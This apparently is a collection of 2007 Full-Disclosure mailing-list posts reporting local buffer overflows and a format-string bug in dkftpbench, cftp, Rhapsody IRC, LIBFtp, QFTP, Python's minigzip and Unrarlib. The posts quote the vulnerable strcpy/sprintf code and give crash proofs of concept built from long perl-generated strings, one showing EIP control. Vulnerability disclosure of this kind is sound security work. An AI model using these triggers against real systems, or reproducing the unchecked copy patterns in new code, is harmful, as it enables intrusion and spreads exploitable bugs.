Re: [Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability
sorry no suid 2007/3/20, 3APA3A <[EMAIL PROTECTED]>: > Dear starcadi, > > Again, a very effective way for user to exploit himself. How can you > elevate your privileges that way? Is dkftpbench suid? > > --Monday, March 19, 2007, 10:32:27 PM, you wrote to > full-disclosure@lists.grok.org.uk: > > s> Description: > > s> dkftpbench is an FTP benchmark program inspired by SPECweb99. The > > s> $ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` > s> -v1 Segmentation fault $ > > > > -- > ~/ZARAZA http://securityvulns.com/ > Почтенные ископаемые! Жду от вас дальнейших писем. (Твен) > > -- .original http://intel.shacknet.nu/ ~ starcadi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability
Description:
CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
Found local buffer overflow in readrc() with sprintf() with no
sizelen control.
source: http://ftp.giga.or.at/pub/nih/cftp/
Source error:
int
readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp,
int check_alias)
{
FILE *f;
char b[8192], *p, *tok, *q, *home;
char *user, *pass, *host, *port, *wdir;
if ((home=getenv("HOME")) == NULL)
home = "";
sprintf(b, "%s/.cftprc", home);
if ((f=fopen(b, "r")) == NULL) {
if (errno == ENOENT)
return 0;
return -1;
}
[..]
}
error in sprintf(), no sizelen control in getenv().
Proof of concept:
$ export HOME=`perl -e "print 'A'x8200"`
$ cftp
Segmentation fault
$
--
.original http://intel.shacknet.nu/
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability
Description:
dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Found buffer overflow in Platoon::init function using strcpy() with no
sizelen control.
source: http://www.kegel.com/dkftpbench/
Source error:
in main():
--
int main(int argc, char **argv)
{
[..]
const char *arg_username = "anonymous";
const char *arg_password = "robouser@";
[..]
} else if (!strncmp(argv[i], "-u", 2)) {
arg_username = &argv[i][2];
} else if (!strncmp(argv[i], "-p", 2)) {
arg_password = &argv[i][2];
[..]
Platoon thePlatoon;
thePlatoon.init(poller, &sked, arg_filename,
arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
arg_hostname, arg_portnum, arg_username, arg_password,
local_addrs, n_local_addrs);
[..]
}
--
in Platoon.h:
--
/// The user name part of the URL to fetch
char m_username[128];
/// The password part of the URL to fetch
char m_passwd[128];
--
in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
const char *servername, int port,
const char *username, const char *passwd,
struct sockaddr_in *local_addrs, int n_local_addrs)
{
[..]
m_port = port;
m_sked = sked;
strcpy(m_passwd, passwd);
strcpy(m_servername, servername);
strcpy(m_username, username);
m_verbosity = 0;
m_local_addrs = local_addrs;
[..]
}
--
Proof of concept:
$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
-h127.0.0.1 host name of ftp server
-P21 port number of ftp server
-n1 number of users
-c1 target number of simultaneous connection attempts
-k2 Start next connection when: 1=immediately, 2=after prev connect complete
-t0 length of run (in seconds)
-b3600 desired bandwidth (in bytes per second)
-B2700 min acceptable per-client bandwidth (in bytes per second)
-ufederico user name
-paa[..]
-fusenet/rec.juggling/juggling.FAQ.Z file to fetch
-m1500 bytes per 'packet'
-v1 verbosity
-sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
-a0 use all local interfaces
Using poll()
Segmentation fault
$
--
.original http://intel.shacknet.nu/
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rhapsody IRC 0.28b (NICK) Multiple fs and bof vulnerability
Rhapsody IRC 0.28b (NICK) Multiple fs and bof vulnerability
Description:
Rhapsody is a text console IRC client for Unix operating systems. It
is small, fast, portable, easy to use and full featured. An intuitive
menu-driven user interface makes rhapsody ideal for beginner to
intermediate users.
Found buffer overflow in various functions.
source: http://sourceforge.net/projects/rhapsody/
Source error:
#define MAXDATASIZE 1024
char nick[MAXDATASIZE];
- command request overflow
if (!sscanf(buffer, "/%s %[^\n]", command, parameters)){
return(E_NONE);
}
- "connect" and "server" request overflow
if (strcasecmp(command, "connect") == 0 || strcasecmp(command, "server") == 0){
pnum = sscanf(parameters, "%s %d", server, &port);
if (pnum < 1){
vprint_all("Usage: /%s [port]\n", command);
return(E_OTHER);
}
- "nick" request overflow
else if (strcasecmp(command, "nick") == 0){
pnum = sscanf(parameters, "%s", nick);
if (pnum < 1){
vprint_all("Usage: /nick \n");
}
else{
sendcmd_server(currentserver, "NICK", nick, "",
currentserver->nick);
strcpy(currentserver->lastnick, currentserver->nick);
strcpy(currentserver->nick, nick);
}
return(E_OTHER);
}
- "ctcp" request overflow
else if (strcasecmp(command, "ctcp") == 0){
if (sscanf(parameters, "%s %[^\n]", nick, message) == 2){
sendcmd_server(currentserver, "PRIVMSG",
create_ctcp_message(message), nick, currentserver->nick);
}
else vprint_all("Usage: /ctcp |\n");
return(E_OTHER);
}
- "dcc chat/send" request overflow
if (strcasecmp(subcommand, "chat") == 0){
pnum = sscanf(subparameters, "%s %[^\n]", nick, message);
if (pnum < 1){
vprint_all("Usage: /dcc chat \n");
return(E_OTHER);
}
- "notice" request overflow
else if (strcasecmp(command, "notice") == 0){
pnum = sscanf(parameters, "%s %[^\n]", nick, message);
if (pnum < 2){
vprint_all("Usage: /%s | \n", command);
return(E_OTHER);
}
sendcmd_server(currentserver, "NOTICE", message, nick,
currentserver->nick);
return(E_OTHER);
}
- "msg" and "message" request overflow
else if (strcasecmp(command, "msg") == 0 || strcasecmp(command,
"message") == 0){
pnum = sscanf(parameters, "%s %[^\n]", nick, message);
if (pnum < 2){
vprint_all("Usage: /%s \n", command);
return(E_OTHER);
}
else if (strcmp(nick, currentserver->nick) == 0) print_all("You can
not chat with yourself.\n");
else if (!currentserver->active) print_all("Must be connected to a
server to chat.\n");
else {
sendcmd_server(currentserver, "PRIVMSG", message, nick,
currentserver->nick);
return(E_OTHER);
}
}
- "chat" and "query" request overflow
else if (strcasecmp(command, "chat") == 0 || strcasecmp(command,
"query") == 0){
chat *C;
pnum = sscanf(parameters, "%s %[^\n]", nick, message);
if (pnum < 1){
vprint_all("Usage: /%s \n", command);
return(E_OTHER);
}
- "me" and "ctcp" request format string
comm.c: 472
char *create_ctcp_message(char *message, ...){
static char buffer[MAXDATASIZE];
va_list ap;
char string[MAXDATASIZE];
va_start(ap, message);
vsprintf(string, message, ap);
va_end(ap);
sprintf(buffer, "%c%s%c", 1, string, 1);
return(buffer);
}
and other: whois, mode, topic..
--
.original http://intel.shacknet.nu/
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow
i know but the security argument in general term comprise too this type. 2007/3/16, [EMAIL PROTECTED] <[EMAIL PROTECTED]>: > On Thu, 15 Mar 2007 21:12:50 BST, =?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?= said: > > On 3/15/07, starcadi starcadi <[EMAIL PROTECTED]> wrote: > > > > > >> POC > > yes, piece of crap. Who cares about local overflows in non-suid > > applications? > > It can be interesting if you can find a way to get some *other* user to > run the application - so if you can find a web server that has a CGI that > invokes QFTP (or whatever) with attacker-controlled parameters, you can use > that to pwn the webserver. Basically, you need to be able to leverage the > distinction between "yourself" and "the userid executing the program". > > -- ~ starcadi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow
http://www.netsw.org/net/ip/filetrans/ftp/libftp/
>> Description
the library has a multiple (sprintf(), strcpy()) buffer overflow in
various functions.
>> Source errors
fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()
the FtpString is a typedef of an array with 256bytes:
FtpLibrary.h: typedef char FtpString[256];
..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
FtpString msg;
sprintf(msg,"SITE CHMOD %03o %s",mode,file);
return FtpCommand(ftp,msg,"",200,EOF);
}
..
int FtpArchie ( char *what, ARCHIE *result, int len)
{
FILE *archie;
FtpString cmd,tmp;
int i;
bzero(result,sizeof(result[0])*len);
sprintf(cmd,"archie -t -l -m %d %s",len,what);
if ((archie = popen(cmd,"r"))==NULL)
return 0;
..
STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
FtpString tmp;
strcpy(tmp,Message);
if (strncmp(tmp,"PASS ",5)==0)
{
char *p=tmp+5;
while ( *p != '\0') *p++='*';
};
..
STATUS FtpOpenDir(FTP * con,char * file)
{
FtpString command;
if ( file == NULL || *file == '\0' )
strcpy(command,"NLST");
else
sprintf(command,"NLST %s",file);
return FtpCommand(con,command,"",120,150,200,EOF);
}
..
int FtpSize(FTP * con, char *filename)
{
FtpString tmp;
int i,size;
strcpy(tmp,"SIZE ");
strcat(tmp,filename);
if ( FtpSendMessage(con,tmp) == QUIT )
return EXIT(con,QUIT);
..
>> POC
#include
#define OVF_BUF (270)
int main()
{
char *buf;
buf = (char *) malloc(OVF_BUF+1);
memset(buf, 'A', OVF_BUF);
// insert function to init ftp connection..
// insert function to manage ftp connection..
// calling vulnerable function example FtpSize()
FtpSize(NULL, buf);
// insert function to close ftp connection..
return(0);
}
--
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow
http://nbpfaus.net/~pfau/ftplib/
qftp is a utility that performs file transfers using ftplib based on
instructions presented on the command line.
>> Description
buffer overflow in sprintf(), set_umask don't check sizelen of passed argument.
>> Source error
in main():
337: case 'm' : set_umask(optarg); break;
..
void set_umask(char *m)
{
char buf[80];
sprintf(buf,"umask %s", m);
ftp_connect();
FtpSite(buf, conn);
}
>> POC
$ gcc ftplib.c getopt.c qftp.c -o ftpsend
$ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"`
Segmentation fault
# eip addr: $1 = (void *) 0x61616161
--
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability
Description:
The source of python contain a various modules, the zlib module contain a
minigzip tool, ( * minigzip is a minimal implementation of the gzip utility.
).
Source error:
the error was found in:
- void file_compress(file, mode)
because the use of strcpy() is inapropriatly
--
#define MAX_NAME_LEN 1024
[..]
void file_compress(file, mode)
char *file;
char *mode;
{
local char outfile[MAX_NAME_LEN];
FILE *in;
gzFile out;
strcpy(outfile, file);
strcat(outfile, GZ_SUFFIX);
--
the function file_compress() was called by main() function.
Proof of concept:
if you want test the vulnerability try:
$ minigzip `perl -e "print 'A'x1050"`
-- starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Unrarlib 0.4.0 (urarlib_get) Local buffer overflow
Description:
in file unrarlib.c don't exist the check control of size len filename
passed in function urarlib_get() using strcpy()
Source error:
--
char ArcName[255];/* RAR archive
..
int urarlib_get(void *output,
unsigned long *size,
char *filename,
void *rarfile,
char *libpassword)
/* Get a file from a RAR file to the "output" buffer. The UniquE RAR
FileLib
* does everything from allocating memory, decrypting and unpacking the
file
* from the archive. TRUE is returned if the file could be successfully
* extracted, else a FALSE indicates a failure.
*/
{
BOOL retcode = FALSE;
#ifdef _DEBUG_LOG
int str_offs;/* used for debug-strings
*/
char DebugMsg[500]; /* used to compose debug msg
*/
if(debug_log_first_start)
{
debug_log_first_start=FALSE;/* only create a new log
file */
debug_init(_DEBUG_LOG_FILE);/* on startup
*/
}
#endif
InitCRC();/* init some vars
*/
strcpy(ArgName, filename);/* set file(s) to extract
*/
#ifdef _USE_MEMORY_TO_MEMORY_DECOMPRESSION
MemRARFile = rarfile; /* set pointer to mem-RAR
file */
#else
strcpy(ArcName, rarfile); /* set RAR file name
*/
#endif
--
-- starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
